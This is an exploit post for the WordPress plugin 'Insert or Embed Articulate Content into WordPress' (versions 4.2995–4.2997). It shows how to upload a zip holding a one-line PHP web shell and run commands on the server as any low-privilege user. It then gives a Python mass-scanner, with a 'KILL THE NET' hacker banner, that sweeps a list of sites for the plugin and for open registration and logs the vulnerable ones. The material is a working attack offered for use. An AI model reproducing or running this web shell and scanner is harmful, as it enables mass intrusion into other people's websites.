WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution (UPLOAD SHELL)

Risk: Medium
Local: No
Remote: Yes

# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin # Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive # Date: june 2019 # Exploit Author: xulchibalraa # Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/ # Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip # Version: 4.2995 <= 4.2997 # Tested on: Wordpress 5.1.1, PHP 5.6 # CVE : - ## 1. Create a .zip archive with 2 files: index.html, index.php echo "<html>hello</html>" > index.html echo "<?php echo system($_GET['cmd']); ?>" > index.php zip poc.zip index.html index.php ## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it) ## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;) ## 4. Access the webshell from the URL displayed after upload similar to http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami ########################################################################## AUTO MASS SCANNER: ########################################################################## # -*- coding: utf-8 -* #!/usr/bin/python ##################################### ##KILL THE NET## #### PS: CHANGE Your Threads pool on line 186 to make script more faster :) ##############[LIBS]################### import requests, re, urllib2, os, sys, codecs, random from multiprocessing.dummy import Pool from time import time as timer import time from platform import system from colorama import Fore from colorama import Style from pprint import pprint from colorama import init from urlparse import urlparse import warnings import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) reload(sys) sys.setdefaultencoding('utf8') init(autoreset=True) ########################################################################################## ktnred = '\033[31m' ktngreen = '\033[32m' ktn3yell = '\033[33m' ktn4blue = '\033[34m' ktn5purp = '\033[35m' ktn6blueblue = '\033[36m' ktn7grey = '\033[37m' CEND = '\033[0m' ##################################### ########################################################################################## try: with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f: ooo = f.read().splitlines() except IndexError: print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' listsite.txt' + CEND) pass ooo = list((ooo)) ########################################################################################## def urlfix(url): if url[-1] == "/": pattern = re.compile('(.*)/') site = re.findall(pattern,url) url = site[0] if url[:7] != "http://" and url[:8] != "https://": url = "http://" + url return url def check_log(url): try: Agent2 = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} se2 = requests.session() log = url+'/wp-login.php?action=register' url = urlfix(url) ktn3 = se2.get(log, headers=Agent2, verify=False, timeout=20) if '<form name="registerform"' in ktn3.content.encode('utf-8'): print (ktn5purp + 'SITE VULN ..... [' + url + ']' + '\n' + CEND) open('SITE-VULN.txt', 'a').write(log+'\n') pass else: print (ktn7grey + 'SITE NOT VULN ..... [' + url + ']' + '\n' + CEND) pass except: pass pass def plgn_check(url): try: url = urlfix(url) payload = url + '/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt' Agent1 = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} se1 = requests.session() ktn2 = se1.get(payload, headers=Agent1, verify=False, timeout=20) if '=== Insert or Embed Articulate Content into Wordpress ====' in ktn2.content.encode('utf-8'): print (ktngreen + 'SEARCHING FOR VULN ..... [' + url + ']' + '\n' + CEND) open('Plugin-on.txt', 'a').write(payload+'\n') check_log(url) else: print (ktn7grey + 'SITE NOT VULN ..... [' + url + ']' + '\n' + CEND) pass except: pass pass def check(url): try: Agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} url = urlfix(url) se = requests.session() ktn1 = se.get(url, headers=Agent, verify=False, timeout=20) if ktn1.status_code == 200: plgn_check(url) pass else: print (ktnred + 'DEAD SITE: ' + url + CEND) pass except: pass ##################################### def logo(): clear = "\x1b[0m" colors = [36, 32, 34, 35, 31, 37] x = ''' FEDERATION BLACK HAT SYSTEM | IG: @_gghost666_ <-.(`-') _ (`-') (`-').-> (`-') _<-. (`-')_ (`-') _(`-') __( OO) (_) <-. <-. ( OO).-> (OO )__ ( OO).-/ \( OO) ) ( OO).-/( OO).-> '-'. ,--.,-(`-'),--. ) ,--. ) / '._ ,--. ,'-'(,------.,--./ ,--/ (,------./ '._ | .' /| ( OO)| (`-') | (`-')|'--...__)| | | | | .---'| \ | | | .---'|'--...__) | /)| | )| |OO ) | |OO )`--. .--'| `-' |(| '--. | . '| |)(| '--. `--. .--' | . '(| |_/(| '__ |(| '__ | | | | .-. | | .--' | |\ | | .--' | | | |\ \| |'->| |' | |' | | | | | | | `---.| | \ | | `---. | | `--' '--'`--' `-----' `-----' `--' `--' `--' `------'`--' `--' `------' `--' KILL THE NET FB: fb/KtN.1990 Note! : We Accept any responsibility for any illegal usage :). ''' for N, line in enumerate(x.split("\n")): sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear)) time.sleep(0.05) pass logo() ########################################################################################## def Main(): try: start = timer() ThreadPool = Pool(100) Threads = ThreadPool.map(check, ooo) print('TIME TAKE: ' + str(timer() - start) + ' S') except: pass if __name__ == '__main__': Main()



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